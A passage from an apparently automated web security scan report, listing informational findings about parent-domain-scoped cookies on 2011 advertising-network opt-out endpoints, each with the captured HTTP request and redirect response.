The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /nai/daa.php?action_id=4&participant_id=7&rd=http%3A%2F%2Fadvertising.aol.com&nocache=6352754&token=1742489720 HTTP/1.1
Host: nai.adserverwc.adtechus.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://advertising.aol.com/nai/nai.php?action_id=4
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OO_TOKEN=1742489720

Response

HTTP/1.1 302 Found
Date: Sun, 13 Nov 2011 18:53:54 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Cache-Control: no-cache
Pragma: no-cache
P3P: CP=NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV
Set-Cookie: JEB2=DELETED; expires=Sat, 12-Nov-2011 15:07:14 GMT; path=/; domain=.nai.adserverwc.adtechus.com
Set-Cookie: JEB2=DELETED; expires=Sat, 12-Nov-2011 15:07:14 GMT; path=/; domain=.adserverwc.adtechus.com
Set-Cookie: JEB2=DELETED; expires=Sat, 12-Nov-2011 15:07:14 GMT; path=/; domain=.adtechus.com
Set-Cookie: OptOut=DELETED; expires=Sat, 12-Nov-2011 15:07:14 GMT; path=/; domain=.nai.adserverwc.adtechus.com
Set-Cookie: OptOut=DELETED; expires=Sat, 12-Nov-2011 15:07:14 GMT; path=/; domain=.adserverwc.adtechus.com
Set-Cookie: OptOut=DELETED; expires=Sat, 12-Nov-2011 15:07:14 GMT; path=/; domain=.adtechus.com
Set-Cookie: JEB2=NOID;expires=Thu, 06-Nov-2036 13:53:54 GMT;domain=adtechus.com;path=/
Set-Cookie: OptOut=we will not set any more cookies;expires=Thu, 06-Nov-2036 13:53:54 GMT;domain=adtechus.com;path=/
Location: http://nai.adserverwc.adtechus.com/nai/daa.php?action_id=2&participant_id=7&is_post_opt_out_check=true&rd=http://advertising.aol.com
Content-Length: 0
Content-Type: text/html


5.19. http://nai.adsonar.com/nai/daa.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://nai.adsonar.com
Path:   /nai/daa.php

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /nai/daa.php?action_id=4&participant_id=1&rd=http%3A%2F%2Fadvertising.aol.com&nocache=6352754&token=174796341 HTTP/1.1
Host: nai.adsonar.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://advertising.aol.com/nai/nai.php?action_id=4
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OO_TOKEN=174796341; oo_flag=t

Response

HTTP/1.1 302 Found
Date: Sun, 13 Nov 2011 18:53:51 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Cache-Control: no-cache
Pragma: no-cache
P3P: CP=NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV
Set-Cookie: oo_flag=DELETED; expires=Sat, 12-Nov-2011 15:07:11 GMT; path=/; domain=.nai.adsonar.com
Set-Cookie: oo_flag=DELETED; expires=Sat, 12-Nov-2011 15:07:11 GMT; path=/; domain=.adsonar.com
Set-Cookie: oo_flag=t;expires=Thu, 06-Nov-2036 13:53:51 GMT;domain=adsonar.com;path=/
Location: http://nai.adsonar.com/nai/daa.php?action_id=2&participant_id=1&is_post_opt_out_check=true&rd=http://advertising.aol.com
Content-Length: 0
Content-Type: text/html


5.20. http://nai.adtech.de/nai/daa.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://nai.adtech.de
Path:   /nai/daa.php

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /nai/daa.php?action_id=4&participant_id=3&rd=http%3A%2F%2Fadvertising.aol.com&nocache=6352754&token=194198501 HTTP/1.1
Host: nai.adtech.de
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://advertising.aol.com/nai/nai.php?action_id=4
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OO_TOKEN=194198501

Response

HTTP/1.1 302 Found
Date: Sun, 13 Nov 2011 18:53:54 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Cache-Control: no-cache
Pragma: no-cache
P3P: CP=NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV
Set-Cookie: JEB2=DELETED; expires=Sat, 12-Nov-2011 15:07:14 GMT; path=/; domain=.nai.adtech.de
Set-Cookie: JEB2=DELETED; expires=Sat, 12-Nov-2011 15:07:14 GMT; path=/; domain=.adtech.de
Set-Cookie: OptOut=DELETED; expires=Sat, 12-Nov-2011 15:07:14 GMT; path=/; domain=.nai.adtech.de
Set-Cookie: OptOut=DELETED; expires=Sat, 12-Nov-2011 15:07:14 GMT; path=/; domain=.adtech.de
Set-Cookie: JEB2=NOID;expires=Thu, 06-Nov-2036 13:53:54 GMT;domain=adtech.de;path=/
Set-Cookie: OptOut=we will not set any more cookies;expires=Thu, 06-Nov-2036 13:53:54 GMT;domain=adtech.de;path=/
Location: http://nai.adtech.de/nai/daa.php?action_id=2&participant_id=3&is_post_opt_out_check=true&rd=http://advertising.aol.com
Content-Length: 0
Content-Type: text/html


5.21. http://nai.advertising.com/nai/daa.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://nai.advertising.com
Path:   /nai/daa.php

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /nai/daa.php?action_id=4&participant_id=0&rd=http%3A%2F%2Fadvertising.aol.com&nocache=6352754&token=1499749799 HTTP/1.1
Host: nai.advertising.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://advertising.aol.com/nai/nai.php?action_id=4
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OO_TOKEN=1499749799; ACID=optout!

Response

HTTP/1.1 302 Found
Date: Sun, 13 Nov 2011 18:53:52 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Cache-Control: no-cache
Pragma: no-cache
P3P: CP=NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV
Set-Cookie: ACID=DELETED; expires=Sat, 12-Nov-2011 15:07:12 GMT; path=/; domain=.nai.advertising.com
Set-Cookie: ACID=DELETED; expires=Sat, 12-Nov-2011 15:07:12 GMT; path=/; domain=.advertising.com
Set-Cookie: ACID=optout!;expires=Thu, 06-Nov-2036 13:53:52 GMT;domain=advertising.com;path=/
Location: http://nai.advertising.com/nai/daa.php?action_id=2&participant_id=0&is_post_opt_out_check=true&rd=http://advertising.aol.com
Content-Length: 0
Content-Type: text/html


5.22. http://nai.glb.adtechus.com/nai/daa.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://nai.glb.adtechus.com
Path:   /nai/daa.php

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /nai/daa.php?action_id=4&participant_id=8&rd=http%3A%2F%2Fadvertising.aol.com&nocache=6352754&token=293319859 HTTP/1.1
Host: nai.glb.adtechus.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://advertising.aol.com/nai/nai.php?action_id=4
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OO_TOKEN=293319859

Response

HTTP/1.1 302 Found
Date: Sun, 13 Nov 2011 18:53:52 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Cache-Control: no-cache
Pragma: no-cache
P3P: CP=NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV
Set-Cookie: JEB2=DELETED; expires=Sat, 12-Nov-2011 15:07:12 GMT; path=/; domain=.nai.glb.adtechus.com
Set-Cookie: JEB2=DELETED; expires=Sat, 12-Nov-2011 15:07:12 GMT; path=/; domain=.glb.adtechus.com
Set-Cookie: JEB2=DELETED; expires=Sat, 12-Nov-2011 15:07:12 GMT; path=/; domain=.adtechus.com
Set-Cookie: OptOut=DELETED; expires=Sat, 12-Nov-2011 15:07:12 GMT; path=/; domain=.nai.glb.adtechus.com
Set-Cookie: OptOut=DELETED; expires=Sat, 12-Nov-2011 15:07:12 GMT; path=/; domain=.glb.adtechus.com
Set-Cookie: OptOut=DELETED; expires=Sat, 12-Nov-2011 15:07:12 GMT; path=/; domain=.adtechus.com
Set-Cookie: JEB2=NOID;expires=Thu, 06-Nov-2036 13:53:52 GMT;domain=adtechus.com;path=/
Set-Cookie: OptOut=we will not set any more cookies;expires=Thu, 06-Nov-2036 13:53:52 GMT;domain=adtechus.com;path=/
Location: http://nai.glb.adtechus.com/nai/daa.php?action_id=2&participant_id=8&is_post_opt_out_check=true&rd=http://advertising.aol.com
Content-Length: 0
Content-Type: text/html


5.23. http://nai.tacoda.at.atwola.com/nai/daa.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://nai.tacoda.at.atwola.com
Path:   /nai/daa.php

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /nai/daa.php?action_id=4&participant_id=2&rd=http%3A%2F%2Fadvertising.aol.com&nocache=6352754&token=687446498 HTTP/1.1
Host: nai.tacoda.at.atwola.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://advertising.aol.com/nai/nai.php?action_id=4
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OO_TOKEN=687446498; atdemo=a3ZoYXNyYz05O2t2cj01MDA=; ATTACID=a3Z0aWQ9MTdicjEybTFpMGtyOTU=; ANRTT=; TData=50014|50213|53575|53770|53823|56856|57587|58839|60145|60506|60548; N=2:d41d8cd98f00b204e9800998ecf8427e,33d93519227d7fc0c737bf49aa17226a; ATTAC=a3ZzZWc9NTAwMTQ6NTAyMTM6NTM1NzU6NTM3NzA6NTM4MjM6NTY4NTY6NTc1ODc6NTg4Mzk6NjAxNDU6NjA1MDY6NjA1NDg=; eadx=x

Response

HTTP/1.1 302 Found
Date: Sun, 13 Nov 2011 18:53:52 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Cache-Control: no-cache
Pragma: no-cache
P3P: CP=NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV
Set-Cookie: atdemo=DELETED; expires=Sat, 12-Nov-2011 15:07:12 GMT; path=/; domain=.nai.tacoda.at.atwola.com
Set-Cookie: atdemo=DELETED; expires=Sat, 12-Nov-2011 15:07:12 GMT; path=/; domain=.tacoda.at.atwola.com
Set-Cookie: atdemo=DELETED; expires=Sat, 12-Nov-2011 15:07:12 GMT; path=/; domain=.at.atwola.com
Set-Cookie: atdemo=DELETED; expires=Sat, 12-Nov-2011 15:07:12 GMT; path=/; domain=.atwola.com
Set-Cookie: ATTACID=DELETED; expires=Sat, 12-Nov-2011 15:07:12 GMT; path=/; domain=.nai.tacoda.at.atwola.com
Set-Cookie: ATTACID=DELETED; expires=Sat, 12-Nov-2011 15:07:12 GMT; path=/; domain=.tacoda.at.atwola.com
Set-Cookie: ATTACID=DELETED; expires=Sat, 12-Nov-2011 15:07:12 GMT; path=/; domain=.at.atwola.com
Set-Cookie: ATTACID=DELETED; expires=Sat, 12-Nov-2011 15:07:12 GMT; path=/; domain=.atwola.com
Set-Cookie: ANRTT=DELETED; expires=Sat, 12-Nov-2011 15:07:12 GMT; path=/; domain=.nai.tacoda.at.atwola.com
Set-Cookie: ANRTT=DELETED; expires=Sat, 12-Nov-2011 15:07:12 GMT; path=/; domain=.tacoda.at.atwola.com
Set-Cookie: ANRTT=DELETED; expires=Sat, 12-Nov-2011 15:07:12 GMT; path=/; domain=.at.atwola.com
Set-Cookie: ANRTT=DELETED; expires=Sat, 12-Nov-2011 15:07:12 GMT; path=/; domain=.atwola.com
Set-Cookie: TData=DELETED; expires=Sat, 12-Nov-2011 15:07:12 GMT; path=/; domain=.nai.tacoda.at.atwola.com
Set-Cookie: TData=DELETED; expires=Sat, 12-Nov-2011 15:07:12 GMT; path=/; domain=.tacoda.at.atwola.com
Set-Cookie: TData=DELETED; expires=Sat, 12-Nov-2011 15:07:12 GMT; path=/; domain=.at.atwola.com
Set-Cookie: TData=DELETED; expires=Sat, 12-Nov-2011 15:07:12 GMT; path=/; domain=.atwola.com
Set-Cookie: N=DELETED; expires=Sat, 12-Nov-2011 15:07:12 GMT; path=/; domain=.nai.tacoda.at.atwola.com
Set-Cookie: N=DELETED; expires=Sat, 12-Nov-2011 15:07:12 GMT; path=/; domain=.tacoda.at.atwola.com
Set-Cookie: N=DELETED; expires=Sat, 12-Nov-2011 15:07:12 GMT; path=/; domain=.at.atwola.com
Set-Cookie: N=DELETED; expires=Sat, 12-Nov-2011 15:07:12 GMT; path=/; domain=.atwola.com
Set-Cookie: ATTAC=DELETED; expires=Sat, 12-Nov-2011 15:07:12 GMT; path=/; domain=.nai.tacoda.at.atwola.com
Set-Cookie: ATTAC=DELETED; expires=Sat, 12-Nov-2011 15:07:12 GMT; path=/; domain=.tacoda.at.atwola.com
Set-Cookie: ATTAC=DELETED; expires=Sat, 12-Nov-2011 15:07:12 GMT; path=/; domain=.at.atwola.com
Set-Cookie: ATTAC=DELETED; expires=Sat, 12-Nov-2011 15:07:12 GMT; path=/; domain=.atwola.com
Set-Cookie: eadx=DELETED; expires=Sat, 12-Nov-2011 15:07:12 GMT; path=/; domain=.nai.tacoda.at.atwola.com
Set-Cookie: eadx=DELETED; expires=Sat, 12-Nov-2011 15:07:12 GMT; path=/; domain=.tacoda.at.atwola.com
Set-Cookie: eadx=DELETED; expires=Sat, 12-Nov-2011 15:07:12 GMT; path=/; domain=.at.atwola.com
Set-Cookie: eadx=DELETED; expires=Sat, 12-Nov-2011 15:07:12 GMT; path=/; domain=.atwola.com
Set-Cookie: atdses=DELETED; expires=Sat, 12-Nov-2011 15:07:12 GMT; path=/; domain=.nai.tacoda.at.atwola.com
Set-Cookie: atdses=DELETED; expires=Sat, 12-Nov-2011 15:07:12 GMT; path=/; domain=.tacoda.at.atwola.com
Set-Cookie: atdses=DELETED; expires=Sat, 12-Nov-2011 15:07:12 GMT; path=/; domain=.at.atwola.com
Set-Cookie: atdses=DELETED; expires=Sat, 12-Nov-2011 15:07:12 GMT; path=/; domain=.atwola.com
Set-Cookie: atdses=O;expires=Thu, 06-Nov-2036 13:53:52 GMT;domain=atwola.com;path=/
Location: http://nai.tacoda.at.atwola.com/nai/daa.php?action_id=2&participant_id=2&is_post_opt_out_check=true&rd=http://advertising.aol.com
Content-Length: 0
Content-Type: text/html


5.24. http://notrack.adviva.net/CookieCheck.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://notrack.adviva.net
Path:   /CookieCheck.php

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /CookieCheck.php?optThis=1 HTTP/1.1
Host: notrack.adviva.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: */*
Referer: http://www.networkadvertising.org/managing/optout_results.asp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ADVIVA=NOTRACK

Response

HTTP/1.1 302 Found
Date: Sun, 13 Nov 2011 18:53:44 GMT
Server: Apache/2.2.4 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Set-Cookie: ADVIVA=deleted; expires=Sat, 13-Nov-2010 18:53:43 GMT; path=/; domain=.adviva.net
Set-Cookie: ADVIVA=NOTRACK; expires=Fri, 11-Nov-2016 18:53:44 GMT; path=/; domain=.adviva.net
P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI NAV"
Location: http://notrack.adviva.net/CookieCheck.php?refreshCheck=1&optThis=1
Content-Length: 0
Connection: close
Content-Type: text/html


5.25. http://notrack.specificmedia.com/CookieCheck.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://notrack.specificmedia.com
Path:   /CookieCheck.php

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /CookieCheck.php?optThis=1&result=optout_success HTTP/1.1
Host: notrack.specificmedia.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: */*
Referer: http://www.networkadvertising.org/managing/optout_results.asp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Date: Sun, 13 Nov 2011 18:53:47 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.6
Set-Cookie: ADVIVA=NOTRACK; expires=Fri, 11-Nov-2016 18:53:47 GMT; path=/; domain=.specificmedia.com
P3P: policyref="http://notrack.specificmedia.com/w3c/p3p.xml", CP="NON DSP COR ADM DEV PSA PSD IVA OUT BUS STA"
Location: http://notrack.specificmedia.com/CookieCheck.php?refreshCheck=1&optThis=1&result=optout_success
Vary: Accept-Encoding
Content-Length: 0
Connection: close
Content-Type: text/html; charset=ISO-8859-1


5.26. http://oo.afy11.net/NAIOptOut.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oo.afy11.net
Path:   /NAIOptOut.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /NAIOptOut.aspx?nocache=0.7163187 HTTP/1.1
Host: oo.afy11.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: */*
Referer: http://www.networkadvertising.org/managing/optout_results.asp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s=1,2*4e62cac9*sFHmM92-82*aKPj71Zsi6DAbl_rJvyOOzXGnw==*; a=AAAAAAAAAAAAAAAAAAAAAA; __qca=P0-1177288715-1316025191253

Response

HTTP/1.1 302 Found
Cache-Control: private
Content-Type: text/html; charset=utf-8
Location: /NAIConfirm.aspx
Server: Microsoft-IIS/7.5
P3P: policyref="http://ad.afy11.net/privacy.xml", CP=" NOI DSP NID ADMa DEVa PSAa PSDa OUR OTRa IND COM NAV STA OTC"
X-AspNet-Version: 4.0.30319
Set-Cookie: a=AAAAAAAAAAAAAAAAAAAAAA; domain=afy11.net; expires=Sat, 13-Nov-2021 00:00:00 GMT; path=/
Set-Cookie: f=; domain=afy11.net; expires=Sat, 13-Nov-2010 00:00:00 GMT; path=/
Set-Cookie: c=; domain=afy11.net; expires=Sat, 13-Nov-2010 00:00:00 GMT; path=/
X-Powered-By: ASP.NET
Date: Sun, 13 Nov 2011 18:54:25 GMT
Content-Length: 133

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="/NAIConfirm.aspx">here</a>.</h2>
</body></html>

5.27. http://open.ad.yieldmanager.net/V1/NWSetter  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://open.ad.yieldmanager.net
Path:   /V1/NWSetter

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /V1/NWSetter?nwid1=20072115599&url=http://info.yahoo.com/nai/nai-verify.html?optoutverify=true%26opter=nai&XTS=1321210423&XSIG=0~d5fc1b609f1ce455e216ef1819125ff12eafa53b HTTP/1.1
Host: open.ad.yieldmanager.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: */*
Referer: http://www.networkadvertising.org/managing/optout_results.asp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BX=ei08qcd75vc4d&b=4&d=4auM3vprYH0wsQ--&s=ii&t=291

Response

HTTP/1.1 302 Found
Date: Sun, 13 Nov 2011 18:53:46 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Set-Cookie: XO=y=1&t=316&v=3&yoo=0&nwid1=20072115599&XTS=1321210426&XSIG=sczL5sUyAl9Hat7ItQrUJILgr5o-;path=/; expires=Tue, 13-Nov-2013 20:00:00 GMT;domain=.yieldmanager.net
Location: http://info.yahoo.com/nai/nai-verify.html?optoutverify=true&opter=nai
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain; charset=utf-8
Cache-Control: private
Content-Length: 808

HTTP/1.1 302 Found
Date: Sun, 13 Nov 2011 18:53:46 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PU
...[SNIP]...

5.28. http://optout.33across.com/api/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optout.33across.com
Path:   /api/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /api/?action=opt-out HTTP/1.1
Host: optout.33across.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: */*
Referer: http://www.networkadvertising.org/managing/optout_results.asp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 33x_nc=33Across+Optout

Response

HTTP/1.1 302 Found
Date: Sun, 13 Nov 2011 18:53:46 GMT
Server: Apache
X-Powered-By: PHP/5.2.17
Expires: Tue, 01 Jan 1980 1:00:00 GMT
Last-Modified: Sun, 13 Nov 2011 18:53:46 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
P3P: CP="NOI DSP COR NID PSA PSD OUR IND UNI COM NAV INT DEM STA"
Set-Cookie: 33x_nc=33Across+Optout; expires=Wed, 10-Nov-2021 18:53:46 GMT; path=/; domain=.33across.com
Location: http://optout.33across.com/api/?action=verify
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Content-Type: text/html; charset=UTF-8


5.29. http://optout.adlegend.com/nai/optout.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optout.adlegend.com
Path:   /nai/optout.php

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /nai/optout.php?action=setcookie HTTP/1.1
Host: optout.adlegend.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: */*
Referer: http://www.networkadvertising.org/managing/optout_results.asp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Date: Sun, 13 Nov 2011 18:54:06 GMT
Server: Apache/2.2.16 (Unix) PHP/5.3.3
X-Powered-By: PHP/5.3.3
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Expires: Sun, 24 Oct 2010 01:00:00 GMT
Set-Cookie: ID=OPT_OUT; expires=Fri, 11-Nov-2016 18:54:06 GMT; path=/; domain=.adlegend.com
Set-Cookie: PrefID=deleted; expires=Sat, 13-Nov-2010 18:54:05 GMT; path=/; domain=.adlegend.com
Set-Cookie: CSList=deleted; expires=Sat, 13-Nov-2010 18:54:05 GMT; path=/; domain=.adlegend.com
Location: /nai/optout.php?action=readcookie
Content-Length: 0
Content-Type: text/html


5.30. http://optout.crwdcntrl.net/optout  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optout.crwdcntrl.net
Path:   /optout

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /optout?d=http://optout.crwdcntrl.net/optout/check.php?src=naioo HTTP/1.1
Host: optout.crwdcntrl.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: */*
Referer: http://www.networkadvertising.org/managing/optout_results.asp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 13 Nov 2011 18:53:49 GMT
Server: Apache/2.2.21 (EL)
X-Powered-By: Servlet 2.4; JBoss-4.0.4.GA (build: CVSTag=JBoss_4_0_4_GA date=200605151000)/Tomcat-5.5
Cache-Control: no-cache
Expires: 0
Pragma: no-cache
P3P: CP=NOI DSP COR NID PSAa PSDa OUR UNI COM NAV
Set-Cookie: cc=optout; Domain=.crwdcntrl.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT
Set-Cookie: cc=optout; Domain=.crwdcntrl.net; Expires=Fri, 01-Dec-2079 22:07:56 GMT; Path=/
Location: http://optout.crwdcntrl.net/optout?d=http://optout.crwdcntrl.net/optout/check.php?src=naioo&ct=Y
Vary: Accept-Encoding
Content-Length: 0
Connection: close
Content-Type: text/plain; charset=UTF-8


5.31. http://optout.doubleclick.net/cgi-bin/dclk/optoutnai.pl  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optout.doubleclick.net
Path:   /cgi-bin/dclk/optoutnai.pl

